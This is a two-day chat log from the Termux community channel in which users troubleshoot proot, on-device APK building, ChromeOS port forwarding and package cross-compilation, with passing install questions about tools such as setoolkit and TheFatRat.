2017-08-02 01:21:08 gitter (vishalbiswas) you can add that to your irc nick
2017-08-02 01:21:27 sdrausty @Hax4us Does gnuroot wheezy mount a container i
2017-08-02 01:21:28 gitter (Hax4us) @vishalbiswas I have one question
2017-08-02 01:21:37 gitter (vishalbiswas) it uses proot
2017-08-02 01:21:42 sdrausty as user in userspace?
2017-08-02 01:22:17 gitter (vishalbiswas) proot doesn’t mount anything, it modifies syscalls on the fly
2017-08-02 01:22:41 gitter (Hax4us) @vishalbiswas I m using gnuroot..and..it provides..fakeroot..so..is it possible in termux..
2017-08-02 01:22:57 gitter (vishalbiswas) fakeroot != root
2017-08-02 01:23:05 sdrausty Can anyone answer my questions eith better snswers than, “It cannot be done.”?
2017-08-02 01:23:07 gitter (vishalbiswas) read up fakeroot docs
2017-08-02 01:23:16 sdrausty ok
2017-08-02 01:23:31 gitter (vishalbiswas) BrainDamage explained why it cannot be done
2017-08-02 01:23:40 sdrausty howdu like submz in build
2017-08-02 01:23:47 sdrausty APKs
2017-08-02 01:23:47 gitter (vishalbiswas) android is designed to restrict that kind of behaviour
2017-08-02 01:24:17 sdrausty @vishalbiswas read up on usrdpace please
2017-08-02 01:24:34 sdrausty usrdspace *userspace
2017-08-02 01:24:38 gitter (vishalbiswas) There is one thing that most android powerusers fail to take notice of
2017-08-02 01:24:50 gitter (vishalbiswas) android uses a modified linux kernel
2017-08-02 01:25:01 gitter (vishalbiswas) not the same one in other distros
2017-08-02 01:25:02 sdrausty I am not an Android power user.
2017-08-02 01:25:13 gitter (vishalbiswas) they have modified it heavily
2017-08-02 01:25:13 sdrausty I am a computer power user.
2017-08-02 01:25:35 sdrausty Termux enables ma Android to be a computer.
2017-08-02 01:25:40 sdrausty ma *my
2017-08-02 01:26:12 gitter (Hax4us) @vishalbiswas I have Ubuntu proot..in termux..I m just want to ask..that…proot Ubuntu is like a real Ubuntu or not..I mean..can I do all things in Ubuntu proot like normal..
2017-08-02 01:26:24 sdrausty subz *submodules
2017-08-02 01:28:22 gitter (vishalbiswas) @Hax4us I’m not a regular user of proot. frumpylava is better qualified for this question
2017-08-02 01:28:59 gitter (Hax4us) Bcz termux has no u
2017-08-02 01:29:16 sdrausty Your suggestion @vishalbiswas Thank you very muvh for informing me of the concept of git submodules.
2017-08-02 01:29:47 gitter (Hax4us) Kk
2017-08-02 01:30:35 gitter (Hax4us) @frumpylava…can I do all things in Ubuntu proot like normal Ubuntu in PC
2017-08-02 01:30:37 sdrausty muvh *much I’m not spamming. Am I? I am correcting a typo.
2017-08-02 01:30:45 gitter (vishalbiswas) you change the repo layout
2017-08-02 01:32:31 frumpylava @Hax4us: No. it barely works and even if it does you still can’t do a lot of things.
2017-08-02 01:32:55 sdrausty How yo link libraries into https://github.com/sdrausty/buildAPKs/blob/master/scripts/build/buildOne.sh @ https://sdrausty.github.io/buildAPKs/ If we can link libraries/articafts then we can build Termux on device. Vorrect?
2017-08-02 01:34:15 sdrausty yo *do && articafts *artifacts && Vorrect *Correct
2017-08-02 01:34:51 gitter (vishalbiswas) i may be wrong, but it may be just as simple as adding it to classpath
2017-08-02 01:35:25 sdrausty frumpylava: Is it possible to grant permission for Termux to use loop devices? #375 https://github.com/termux/termux-app/issues/375
2017-08-02 01:36:59 frumpylava sdrausty: I don’t know.
2017-08-02 01:38:23 sdrausty frumpylava: How is the English subtitling comming along? The repost of your presentation at Google+ Linux https://plus.google.com/109614420080028230010/posts/jdA6EJVamni was deleted, it seemx
2017-08-02 01:40:46 frumpylava sdrausty: Haven’t gotten around to it yet.
2017-08-02 01:41:04 sdrausty @fornwall might know how to link libraries and artifacts into buildOne.sh This might enable building Termux on device (a smartphone
2017-08-02 01:41:12 sdrausty ok
2017-08-02 01:41:33 gitter (vishalbiswas) you know, you can ask in that termux-packages issue
2017-08-02 01:42:38 sdrausty I woild like to know what yoy said. It sounded nice, and you heard applause. Brawo.
2017-08-02 01:43:46 sdrausty @vishalbiswas This does not seem to be a package issue after all https://github.com/termux/termux-app/issues/376
2017-08-02 01:44:36 gitter (vishalbiswas) i didn’t mean a new issue
2017-08-02 01:44:46 gitter (vishalbiswas) there are old issues about building apps on termux
2017-08-02 01:45:40 sdrausty https://github.com/termux/termux-app/issues/375 && https://github.com/termux/termux-packages/issues/1176 can be closed as far as I am concerned, @present.
2017-08-02 01:47:08 sdrausty @vishalbiswas That is how https://sdrausty.github.io/buildAPKs was made. I am planning to add a contibutirs page. You are on this list.
2017-08-02 01:47:34 sdrausty too
2017-08-02 01:58:37 mr1404 is anyone there ?
2017-08-02 01:59:05 mr1404 Anybody tell me beyond sqlmap what other tools are available?
2017-08-02 02:02:46 sdrausty $ apt list | grep sql |
2017-08-02 02:46:33 sdrausty I really adoar (like) mrwhite hbu mr1404? https://github.com/sdrausty/buildAPKsClassifiedApps/tree/master/flashlights/mrwhite What do u think of mrwhite? Moreover, it builds on device in Termux! Please submit your opinions ‘bout mrwhite compiling on device (yes, you smartphone) here. Or at https://github.com/sdrausty/buildAPKs/wiki
2017-08-02 02:49:06 sdrausty mr1404: What do you thhink of mrwhite?
2017-08-02 02:52:07 mr1404_ ~~~~
2017-08-02 02:52:55 mr1404_ How to install
2017-08-02 02:52:57 sdrausty @vashalbiswas Have you tried mrwhite? https://github.com/sdrausty/buildAPKsApps/tree/master/flashlights/mrwhite Please let me in on how enjoying the build and use was?
2017-08-02 02:53:49 sdrausty mr1404: https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice enjoy!
2017-08-02 02:53:54 mr1404_ I want to install the tools on linux into the termux
2017-08-02 02:54:49 sdrausty tools @buildAPKs and more @ https://sdrausty.github.io/pages/more
2017-08-02 02:55:50 mr1404_ thank you
2017-08-02 02:56:06 sdrausty ur welcome :)
2017-08-02 02:57:13 mr1404_ I installed apache2 but when I type http: // locahost / browser it does not show up
2017-08-02 03:00:16 sdrausty mr1404_: Please tell us about how you like mrwhite https://github.com/sdrausty/buildAPKsApps/tree/master/flashlights/mrwhite @fornwall How do you like the build, install and run of mrwhite? Feedback requested from…
2017-08-02 03:00:27 sdrausty EVERYONE
2017-08-02 03:01:14 mr1404_ Sorry I’m not good at my english from vietnam
2017-08-02 03:03:41 mr1404_ Any episodes can help me personally
2017-08-02 03:06:56 sdrausty mr1504_: in Termux please try:
2017-08-02 03:07:01 sdrausty cd && pkg install aapt apksigner dx ecj git
2017-08-02 03:07:01 sdrausty git clone https://github.com/sdrausty/buildAPKs
2017-08-02 03:07:01 sdrausty ./buildAPKs/buildMyFirstAPK.sh
2017-08-02 03:09:19 sdrausty Everyone else on channel is invited to try the command lines ^^above^^ Feedback requested @ https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsOnDevice Now how can we get Termux on the Linux #channels?
2017-08-02 03:09:46 sdrausty too
2017-08-02 03:11:50 sdrausty deleted https://plus.google.com/109614420080028230010/posts/jdA6EJVamni zero info ‘bout Termux @linux google+ deleted bummer
2017-08-02 03:14:47 gitter (sdrausty) articafts *artifacts
2017-08-02 03:55:13 MR14041 alo
2017-08-02 03:58:15 sdrausty lolo
2017-08-02 04:22:33 Nabil Hi
2017-08-02 04:25:52 sdrausty Nabil: Hello
2017-08-02 04:32:08 usertermux hello
2017-08-02 04:36:44 live_the_dream hello
2017-08-02 04:38:34 cottongin hello
2017-08-02 04:40:09 frumpylava hello
2017-08-02 04:41:05 gitter (Grimler91) hello
2017-08-02 04:44:14 sdrausty hi
2017-08-02 04:44:23 sdrausty bonjour
2017-08-02 04:44:35 sdrausty hola
2017-08-02 04:45:33 gitter (Grimler91) hej
2017-08-02 04:48:57 sdrausty yes @Grimler91
2017-08-02 04:52:58 sdrausty I got in a little bit of trouble speaking ‘bout Termux @ #debian
2017-08-02 04:54:24 sdrausty We are a debian derivitive. Termux and Ubuntu both are.
2017-08-02 04:55:09 sdrausty Derivitives of… debian https://www.debian.org
2017-08-02 05:20:35 sdrausty I want more native space on device. https://github.com/termux/termux-app/issues/376 How ‘bout U?
2017-08-02 05:50:57 live_the_dream sdrausty: plz stop…
2017-08-02 05:53:27 BrainDamage everyone wants more space, it just can’t be done like that
2017-08-02 05:58:51 sdrausty yes it can
2017-08-02 05:59:04 sdrausty it can
2017-08-02 05:59:08 sdrausty we can
2017-08-02 06:05:11 live_the_dream no …
2017-08-02 06:05:18 live_the_dream people have been looking into that for years
2017-08-02 06:05:29 live_the_dream foldermount
2017-08-02 06:06:14 live_the_dream and many others … iv not seen anything on that front that doesn’t require root
2017-08-02 06:06:22 live_the_dream and no proot…
2017-08-02 06:07:13 live_the_dream linux deploy needs chroot and can;6 mount images without root
2017-08-02 06:07:28 live_the_dream its an old android issue…
2017-08-02 06:08:56 BrainDamage he’s confused because linux deploy also has a proot mode where it just uses a folder
2017-08-02 06:09:17 BrainDamage and he assumes because the proot mode where it uses the folder is the same as the mount loop mode …
2017-08-02 06:09:57 BrainDamage plus he googles “mountloop” and starts copypasting he first result without even clicking the link, given it’s unrelated stuff
2017-08-02 07:09:54 gitter (themastersunil) How can i move folder into another folder in termux….. But my folder is not empty
2017-08-02 07:10:13 gitter (themastersunil) which commend i use???
2017-08-02 07:15:21 live_the_dream mv
2017-08-02 07:15:21 live_the_dream ?
2017-08-02 07:16:58 gitter (Hax4us) Yes MV
2017-08-02 07:17:07 gitter (Hax4us) mv*
2017-08-02 07:18:37 gitter (Hax4us) @vishalbiswas @sdrausty @frumpylava plz solve this…error….while extracting ..a file..using …tar..tar : bin/rbash: Cannot change mode to rwx——: No such file or directory
2017-08-02 07:18:37 gitter (Hax4us) tar: bin/ypdomainname: Cannot change mode to rwx——: No such file or directory
2017-08-02 07:18:37 gitter (Hax4us) Bus error
2017-08-02 07:20:24 live_the_dream ls
2017-08-02 07:20:24 live_the_dream hmm,
2017-08-02 07:21:06 gitter (Hax4us) Its for me ? L’s
2017-08-02 07:21:10 gitter (Hax4us) ls
2017-08-02 07:22:27 live_the_dream nah its me doing typos
2017-08-02 07:22:27 live_the_dream reminds me of this https://github.com/termux/termux-packages/issues/1054
2017-08-02 07:22:55 gitter (Hax4us) Point to be noted..that..after changing the permission by chmod tar gives error only bus error
2017-08-02 07:23:41 live_the_dream now that might help you
2017-08-02 07:24:00 gitter (Hax4us) Kk..let me try
2017-08-02 07:29:33 gitter (Hax4us) Now error is
2017-08-02 07:29:33 gitter (Hax4us) proot info: vpid 1: terminated with signal 7
2017-08-02 07:30:16 gitter (Hax4us) Anybody…?
2017-08-02 07:50:56 live_the_dream which file is it ..
2017-08-02 07:51:41 gitter (Hax4us) Ubuntu.tar.gz
2017-08-02 08:27:12 mr1404 Hello
2017-08-02 08:29:40 mr1404 You something
2017-08-02 08:31:37 gitter (Hax4us) I solved :smile:
2017-08-02 08:33:37 mr1404 Someone please help me when i try to run the buildMyFirstAPK.sh command
2017-08-02 08:33:54 mr1404 https://usercontent.irccloud-cdn.com/file/z4dmSRuv/Screenshot_20170802-193303.png
2017-08-02 08:34:03 gitter (Hax4us) But i will open a issue…bcz in my mobile..it requires root
2017-08-02 08:36:23 gitter (Hax4us) @mr1404 …i m using aide …it is
2017-08-02 08:36:31 gitter (Hax4us) Best
2017-08-02 08:37:12 mr1404 ??
2017-08-02 08:46:19 mr1404 How to use apache2? Open a website on the locahost
2017-08-02 10:25:43 gitter (Ashish882) Hi
2017-08-02 10:25:46 gitter (Ashish882) Anyone
2017-08-02 10:25:58 gitter (Ashish882) How to uninstall setoolkit
2017-08-02 10:39:28 gitter (mklein994) @Hax4us if it’s any consolation, I have the same error. ARM device, Android 7.1.2.
2017-08-02 10:39:52 gitter (mklein994) For termux-chroot
that is.
2017-08-02 10:43:12 gitter (mklein994) Just thought I’d share it here: :py3 print('hi')
in Neovim is works, (part of issue #598), thanks @christianrondeau for the heads up! This means that plugins requiring python3 will work, such as deoplete.
2017-08-02 10:45:20 gitter (Ashish882) If you know to uninstall setoolkit then tell me
2017-08-02 10:49:58 gitter (mklein994) Nope, sorry. I don’t even know what that is. It sounds like something found in every script kiddy’s toolbox :wink:. The GitHub page describes it as “The Social Engineer’s Toolkit” https://github.com/trustedsec/social-engineer-toolkit/blob/master/README.md
2017-08-02 10:52:27 gitter (mklein994) Wait, you said ininstall?
2017-08-02 10:52:39 gitter (Ashish882) Lol . kiddy toolbox . if that is kid than you are the best developer of world you can make any coding. Lol If you think every tool kidy that you are mad
2017-08-02 10:53:31 gitter (mklein994) How’d you get it in the first place?
2017-08-02 10:53:58 gitter (Ashish882) That is not your problem
2017-08-02 10:54:12 gitter (Ashish882) I only want a command to uninstall it
2017-08-02 10:54:22 gitter (Ashish882) Someone is asking me so
2017-08-02 10:58:09 gitter (vishalbiswas) To uninstall something, you must know how you installed it, to know which files need to be removed
2017-08-02 10:58:55 gitter (Ashish882) Git clone it
2017-08-02 10:59:09 gitter (Ashish882) Python setup.py
2017-08-02 10:59:22 gitter (Ashish882) Now I want to uninstall setoolkit
2017-08-02 10:59:50 gitter (vishalbiswas) Remove the installed gems in requirements file. Then delete the folder
2017-08-02 11:00:31 gitter (vishalbiswas) And next time, don’t be so offensive
2017-08-02 11:00:39 gitter (Ashish882) OK…
2017-08-02 11:00:56 gitter (Ashish882) But he is saying setoolkit kidy tool
2017-08-02 11:01:00 gitter (vishalbiswas) We are all here to help each other
2017-08-02 11:01:07 gitter (vishalbiswas) Read it again
2017-08-02 11:01:08 gitter (Ashish882) Yes
2017-08-02 11:01:22 gitter (vishalbiswas) He said it sounds like
2017-08-02 11:01:39 gitter (Ashish882) Ohh yes
2017-08-02 11:01:41 gitter (Ashish882) Story
2017-08-02 11:01:44 gitter (Ashish882) Sort
2017-08-02 11:01:45 gitter (vishalbiswas) which implies he hasn’t heard about it
2017-08-02 11:02:05 gitter (Ashish882) I think he making fun of that tool
2017-08-02 11:02:14 gitter (Ashish882) Then I became angrey
2017-08-02 11:02:31 gitter (vishalbiswas) Everybody can have an opinion about a name, nothing to get angry about
2017-08-02 11:03:21 gitter (Ashish882) Yes. But making that tool is for use who we are to make fun
2017-08-02 11:03:31 gitter (Ashish882) But sorry bro
2017-08-02 11:03:44 gitter (Ashish882) @mklein994
2017-08-02 11:04:03 gitter (Ashish882) I don’t read it
2017-08-02 12:18:19 gitter (themastersunil) how can i install tput package in termux?
2017-08-02 12:23:32 gitter (themastersunil) ??
2017-08-02 12:24:10 gitter (vishalbiswas) what’s that?
2017-08-02 12:24:59 gitter (themastersunil) [ ✔ ] Done ! ….Proceeding with setup
2017-08-02 12:24:59 gitter (themastersunil)
2017-08-02 12:24:59 gitter (themastersunil) TERM environment variable not set.
2017-08-02 12:24:59 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5981fcda45fc670746ebc5dd]
2017-08-02 12:25:10 gitter (themastersunil) FatRatProblem
2017-08-02 12:26:03 gitter (themastersunil) TheFatRat not installing after
2017-08-02 12:26:06 gitter (themastersunil) —–+
2017-08-02 12:26:06 gitter (themastersunil) | [ 1 ] Setup Metasploit Framework Path Manually |
2017-08-02 12:26:06 gitter (themastersunil) | [ 2 ] Install Metasploit Framework from Kali Repository |
2017-08-02 12:26:06 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5981fd1d2723db8d5e6b5f76]
2017-08-02 12:28:44 gitter (vishalbiswas) tput should be ins ncurses-utils package
2017-08-02 12:30:07 gitter (themastersunil) Okk
2017-08-02 12:30:19 gitter (themastersunil) First I’ll install mrtasploit
2017-08-02 13:20:50 sdrausty @vishabiswas gnuroot wheezy creates and mounts a filesystem nonroot in Android. Cannot find the source, though.
2017-08-02 13:22:26 sdrausty https://github.com/termux/termux-app/issues/376
2017-08-02 13:22:59 sdrausty Feature Request: mount loopback device
2017-08-02 13:37:11 gitter (vishalbiswas) live_the_dream: what was the fix for __mulodi4
?
2017-08-02 13:46:48 gitter (vishalbiswas) when cross compiling
2017-08-02 13:48:36 gitter (vishalbiswas) can’t use gcc, mongodb refuses to use anything below 5.3.0
2017-08-02 13:49:54 gitter (vishalbiswas) should I add compiler_rt package then?
2017-08-02 13:55:25 linkneverdie helo
2017-08-02 13:56:19 linkneverdie T_T
2017-08-02 13:56:49 mr1404 what ?
2017-08-02 13:56:58 linkneverdie ai biet tiengviet khong
2017-08-02 13:57:37 mr1404 I know Vietnamese
2017-08-02 13:57:41 linkneverdie :)))
2017-08-02 13:57:49 mr1404 có chuyện gì ?
2017-08-02 13:57:57 linkneverdie cai nay dung sao
2017-08-02 13:58:15 mr1404 thì bt chứ sao
2017-08-02 13:58:28 linkneverdie exit pp
2017-08-02 15:21:51 piuz what is the overall package?
2017-08-02 15:44:47 sdrausty piuz: 660 packages that are available from https://sdrausty.github.io/pages/more
2017-08-02 15:47:54 sdrausty Feature request: to be able to ask a bot on this channel, “How many packages are there?” And similar questions, i.e. like jelly at #debian
2017-08-02 15:49:42 sdrausty or dpkg @ #debian
2017-08-02 16:04:10 sdrausty source for the above feature request “channel bot like dpkg @ #debian” is @ http://blootbot.sf.net Can someone implement this feature, please?
2017-08-02 16:12:07 live_the_dream @vishabiswas you can use patchelf to add libcompiler_rt.so to required libs
2017-08-02 16:12:16 live_the_dream patchelf –add-needed libcompiler_rt.so $bin
2017-08-02 16:13:08 live_the_dream even the x86 versiin on linux distros can do it
2017-08-02 17:09:01 gitter (christianrondeau) @fornwall and @frumpylava - I just read your conversation about doze mode and the wake lock slowing down Termux (when I’m using SSH to connect to my phone, I have to continually touch the screen to keep it on :P ) - I understand there’s a plan to add Termux to the whitelist https://developer.android.com/training/monitoring-device-state/doze-standby.html#whitelisting-cases, but since there’s no issue in GitHub and I’m very
2017-08-02 17:09:01 gitter create one for follow-up and knowing if/when it’s done/abandoned?
2017-08-02 18:12:09 keeger hello guys
2017-08-02 18:12:44 keeger i am having a little trouble with accessing a webserver in a termux console. was wondering if someone can help?
2017-08-02 18:14:34 keeger basically i have a lan, 192.168.*, and my chromebook with termux is running at localhost port 8080. i can connect to it via the local browser using the termux ip, which is like 100. something. however, my other computer can’t see that.
2017-08-02 18:15:08 keeger is there a way to set this up so it can be seen by devices on the same network?
2017-08-02 18:19:43 cottongin i don’t know if chromeos has firewall options or not, you could try port forwarding in your router
2017-08-02 18:20:17 keeger it’s something on the chromebook or termux that’s in the way
2017-08-02 18:20:28 cottongin chromebook
2017-08-02 18:20:57 cottongin i doubt you can expose the internal (chromebook+termux) network to the rest of your network
2017-08-02 18:21:47 cottongin at least not without being in dev mode and using croton (perhaps)
2017-08-02 18:23:53 u0_a193 howdy
2017-08-02 18:24:56 keeger hmm i was hoping to avoid that
2017-08-02 18:25:45 u0_a193 how can i install gnu cobol in termux?
2017-08-02 18:26:30 keeger i know i can setup SSH server in termux, I wonder if I can setup some kind of tunnel?
2017-08-02 18:27:21 keeger so a request comes from my other machine to the ip, and it sends it through the ssh pathway?
2017-08-02 18:46:08 stef204 hi, just installed locate, and ran ‘updatedb’ but nothing shows when I try to use locate. It looks like either the db did not get created or updatedb needs something else?
2017-08-02 20:29:15 gitter (AshleyNykiel) locate updatedb
2017-08-02 20:33:15 gitter (AshleyNykiel) updatedb -v
2017-08-02 21:21:03 gitter (pizzapanther) trying to install node.js via nvm and it hangs on a git clone, any suggestions?
2017-08-02 22:04:51 gitter (pizzapanther) weird used the manual install and it works
2017-08-02 22:13:32 gitter (vishalbiswas) live_the_dream: it needs to link the so in the first place. I used a hack which defines __builtin_smull_overflow
as a macro
2017-08-02 22:25:20 live_the_dream openblas for arm softfp …
2017-08-02 22:25:20 live_the_dream no more compiling libatlas
2017-08-02 22:53:19 gitter (vishalbiswas) no idea what you’re about
2017-08-02 23:08:58 live_the_dream lets just say the most annoying part of supporting scipy is no longer
2017-08-02 23:11:05 gitter (vishalbiswas) I looked into openblas repo and it seems the code for android was there for some time
2017-08-02 23:12:01 live_the_dream android hardfp
2017-08-02 23:12:01 live_the_dream on arm
2017-08-02 23:12:07 live_the_dream we use softfp
2017-08-02 23:12:24 live_the_dream its only avail with 0.2.20
2017-08-02 23:12:30 gitter (vishalbiswas) does it matter? we can execute both, couldn’t we?
2017-08-02 23:13:15 live_the_dream no
2017-08-02 23:13:42 gitter (vishalbiswas) “no” to 1st part or 2nd part
2017-08-02 23:14:16 live_the_dream second part
2017-08-02 23:14:58 gitter (vishalbiswas) all armv7-a chips are hardfp, what’s the problem then?
2017-08-02 23:15:03 live_the_dream no execute hardfp… you can’t link softfp and hardfp
2017-08-02 23:15:03 live_the_dream or something
2017-08-02 23:15:03 live_the_dream its still there in android
2017-08-02 23:15:03 live_the_dream just not in our bit
2017-08-02 23:15:16 live_the_dream google dropped support
2017-08-02 23:16:09 live_the_dream recommending softfp
2017-08-02 23:16:47 gitter (vishalbiswas) okay so no linking between hard and soft float
2017-08-02 23:38:45 gitter (vishalbiswas) anybody with prior scons knowledge?
2017-08-02 23:39:00 gitter (vishalbiswas) scons: *** [core] Source \
mongo’ not found, needed by target core'.
2017-08-02 23:39:10 gitter (vishalbiswas) scons: *** [core] Source 'mongo' not found, needed by target 'core'.
2017-08-02 23:41:20 mason_ anybody had any luck getting Ruby native gems to build in Termux?
2017-08-02 23:41:44 keeger is there a firewall built into termux?
2017-08-02 23:42:15 keeger i’m trying to figure out why the termux IP is not the same as the device ip
2017-08-02 23:42:22 gitter (vishalbiswas) chromeos?
2017-08-02 23:42:49 keeger yea
2017-08-02 23:42:53 gitter (vishalbiswas) mason_: native gems do build
2017-08-02 23:43:36 mason_ seems like they should I must be missing something
2017-08-02 23:43:43 gitter (vishalbiswas) keeger: android sub system is practically a virtual machine in chrome os. that network mismatch is in the design
2017-08-02 23:43:50 mason_ trying to build Nokogiri
2017-08-02 23:44:11 mason_ I installed libxml2 through the pkg system
2017-08-02 23:44:28 keeger gitter, i am trying to access a webserver running in termux from a device on the lan. but i can’t get a route to it
2017-08-02 23:44:28 gitter (vishalbiswas) mason_: there #69 and #79 should help
2017-08-02 23:44:29 mason_ I think I need to point the build process to use that, but I’m not sure which file/dir to point it to
2017-08-02 23:44:56 gitter (vishalbiswas) keeger: try ifconfig to get the ip of termux
2017-08-02 23:45:53 keeger gitter, i do that, and get 100.115.92.2 but I can’t access that from my 192.168 network
2017-08-02 23:46:01 keeger i have no route to it
2017-08-02 23:46:24 keeger but i don’t see iptables on chromeos to set up a forwarding thing
2017-08-02 23:47:33 gitter (vishalbiswas) can you access it within chromeos and also within termux?
2017-08-02 23:48:34 keeger yeah. inside termux i can do localhost with lynx and it’s fine. in chromeos i can use the 100.x.x.x ip and it works. but i want to access the site from a 2nd device that is on the same network as the chromeos device. they both are in 192.168 network
2017-08-02 23:50:10 gitter (vishalbiswas) there must be a way to port forward
2017-08-02 23:50:38 mason_ thanks gitter, that worked perfectly!
2017-08-02 23:50:42 keeger gitter, i haven’t found one yet. everyone wants to root the chromeos, but i’d like to avoid that. that’s the only missing step
2017-08-02 23:50:54 gitter (vishalbiswas) seems like you need to be in dev mode
2017-08-02 23:51:15 keeger but doens’t that wipe the device?
2017-08-02 23:51:22 gitter (vishalbiswas) https://www.chromestory.com/2013/09/default-port-forwarding-git-integration-chromebook/
2017-08-02 23:51:34 gitter (vishalbiswas) says it should be available at chrome://inspect
2017-08-02 23:52:32 gitter (vishalbiswas) there is port forwarding button there
2017-08-02 23:52:48 keeger OOOH
2017-08-02 23:52:57 keeger dude, i have shitty google skills
2017-08-02 23:56:32 gitter (vishalbiswas) i assume rooting must be required for ports below 1024, so you should be good for anything above that
2017-08-02 23:59:48 keeger bleh it’s not working. per the help in chrome, it’s part of remote android debugging and requires me to plug in an android device via usb
2017-08-03 00:00:00 keeger which explains why it’s next to the discover USB checkbox
2017-08-03 00:02:32 gitter (vishalbiswas) are you sure there’s no iptable?
2017-08-03 00:02:35 keeger not in unrooted
2017-08-03 00:02:44 keeger i assume its there but locked
2017-08-03 00:02:58 keeger it’s not in the chroot advanced commands terminal
2017-08-03 00:03:32 keeger can i socks proxy it somehow?
2017-08-03 00:03:59 keeger i mean i can do that locally, but i can’t see how to expose that to the 2nd device
2017-08-03 00:04:19 gitter (vishalbiswas) is there a chrome extension webserver which can act as a relay?
2017-08-03 00:05:32 keeger oh maybe. there is an extension hmm
2017-08-03 00:06:07 keeger https://chrome.google.com/webstore/detail/web-server-for-chrome/ofhbbkphhbklhfoeikjpcbhemlocgigb?hl=en
2017-08-03 00:06:14 keeger seems like this might do the trick
2017-08-03 00:06:26 gitter (vishalbiswas) keeger: try this too -> https://serverfault.com/questions/252150/port-forwarding-on-linux-without-iptables
2017-08-03 00:06:38 mason_ Awesome, even got RVM compiling another Ruby version
2017-08-03 00:07:11 mason_ incidentally, does anybody know why that Ken White article recommends SSHing into Termux?
2017-08-03 00:07:20 mason_ The normal termux console seems fine to me
2017-08-03 00:07:55 live_the_dream the terminal on chromium using android stuff isn’t done right
2017-08-03 00:07:55 live_the_dream i think
2017-08-03 00:07:57 live_the_dream i don’t have chromeos so i dunno
2017-08-03 00:08:14 keeger mason_, i didn’t do that step because it didn’t make much sense to me either. i was thinking maybe multiple ssh sessions?
2017-08-03 00:08:24 gitter (vishalbiswas) who is ken white?
2017-08-03 00:08:56 live_the_dream yeah
2017-08-03 00:09:06 keeger gitter, a guy who wrote an article on how to setup a developer chromebook without rooting / crouton / ubuntu. he leverages Termux :)
2017-08-03 00:09:14 mason_ wrote this article on using Termux on Chromebooks https://blog.lessonslearned.org/building-a-more-secure-development-chromebook/
2017-08-03 00:09:26 keeger https://blog.lessonslearned.org/building-a-more-secure-development-chromebook/
2017-08-03 00:10:00 gitter (vishalbiswas) i read that blog but never the author’s name
2017-08-03 00:10:22 mason_ ah yeah, figured it’d be an easier way to refer to it
2017-08-03 00:11:03 mason_ I set up the SSH, but I don’t see much point to it
2017-08-03 00:11:57 mason_ maybe copy and paste between the main OS I guess?
2017-08-03 00:12:09 mason_ looks like one of the termux extensions might do that though
2017-08-03 00:12:30 keeger yeah i couldn’t make heads or tails of that. unless it’s related to the init stuff
2017-08-03 00:12:48 keeger sshd start = init start maybe
2017-08-03 00:13:44 gitter (vishalbiswas) is there a chromeos virtual machine possible?
2017-08-03 00:13:56 keeger i didn’t realize it would be so difficult to make this server available to the network.
2017-08-03 00:14:14 gitter (vishalbiswas) did you try the socat method?
2017-08-03 00:14:49 keeger socat? i tried that extension i just found, but its for physical files/folders
2017-08-03 00:15:06 mason_ I wonder if you could SSH out from termux to the other machine and set up port forwarding
2017-08-03 00:15:13 gitter (vishalbiswas) keeger: https://serverfault.com/questions/252150/port-forwarding-on-linux-without-iptables
2017-08-03 00:16:03 live_the_dream hmmm
2017-08-03 00:16:03 live_the_dream might have to get a chromeos image for virtualbox or something
2017-08-03 00:17:19 gitter (vishalbiswas) Cr OS is available, but, does it support android apps like the real one?
2017-08-03 00:17:56 keeger gitter, in order to android apps you have to set it to beta channel and install play store
2017-08-03 00:18:05 live_the_dream no idea
2017-08-03 00:18:06 live_the_dream probably not
2017-08-03 00:18:08 keeger so if you try the vm, make sure you know that step
2017-08-03 00:19:06 live_the_dream btw im setting up my build stuff so … getting what chromeos needs most
2017-08-03 00:19:07 live_the_dream a fortran compiler
2017-08-03 00:19:15 live_the_dream for your fortran on the go needs
2017-08-03 00:20:22 mason_ thanks all and good night
2017-08-03 00:20:44 gitter (vishalbiswas) good morning to you too
2017-08-03 00:22:46 keeger found a port forwarding app in the play store. gonna give that a shot
2017-08-03 00:23:33 gitter (vishalbiswas) anything android probably won’t work
2017-08-03 00:25:56 keeger oh right
2017-08-03 00:26:27 keeger i wish that web server wasn’t so file oriented heh
2017-08-03 01:53:00 gitter (vishalbiswas) ```
2017-08-03 01:53:00 gitter (vishalbiswas) fatal error: error in backend: Cannot select: 0x106cbf08: i32 = truncate 0x1058d248
2017-08-03 01:53:00 gitter (vishalbiswas) 0x1058d248: f64 = ARMISD::VMOVDRR 0x106c0da8, 0x105c0a50
2017-08-03 01:53:00 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=5982ba3c2723db8d5e6df108]
2017-08-03 01:53:32 gitter (vishalbiswas) any ideas?
2017-08-03 02:14:12 live_the_dream what is that vish?
2017-08-03 02:16:06 live_the_dream what you trying to do? mongodb?
2017-08-03 04:07:26 sdrausty #termux│16:57:06 jelly | binary debs or source code? http://ircbots.debian.net/stats/ |
2017-08-03 04:08:33 sdrausty http://blootbot.sf.net, or “apt-get source blootbot”
2017-08-03 07:11:52 gitter (Techzindia) Can anyone Try to install Apktool in termux…
2017-08-03 07:37:17 gitter (Hax4us) @Techzindia our YAML library (SnakeYAML isn’t compatible on top of Android).
2017-08-03 07:37:17 gitter (Hax4us)
2017-08-03 07:37:17 gitter (Hax4us) Finally, our native binary (aapt) that has builds for Mac 64/32, Unix 64/32 and Windows doesn’t have an ARM build for AOSP. That is why , bro….i think we cant use apktool…in termux…but …well…nothing..is impossible…maybe…it can be possible..in future..
2017-08-03 08:27:02 gitter (Hax4us) @vishalbiswas @frumpylava @sdrausty guys…please…tell..me..the alternatives of lib32stdc++6 lib32ncurses5 lib32z1 in termux….plz…i m very near…to run apktool
2017-08-03 08:46:05 Benl90 Hello, I’ve question, is there any shortcut to move between terminal window? Thanks
2017-08-03 08:52:00 Benl90 anyone?
2017-08-03 08:52:13 Benl90 sdrausty: Are you there?
2017-08-03 10:08:50 gitter (Hax4us) Hey.all..are bsy…?
2017-08-03 10:08:57 gitter (Hax4us) @vishalbiswas
2017-08-03 11:25:40 gitter (vishalbiswas) We have ncurses, others are not required
2017-08-03 11:26:38 gitter (vishalbiswas) live_the_dream: yes mongodb
2017-08-03 12:06:59 gitter (vishalbiswas) seems like a problem with mozilla (spidermonkey) source
2017-08-03 12:09:25 gitter (Hax4us) @vishalbiswas have u any idea about this error comes while decompile apk using apktool in termux
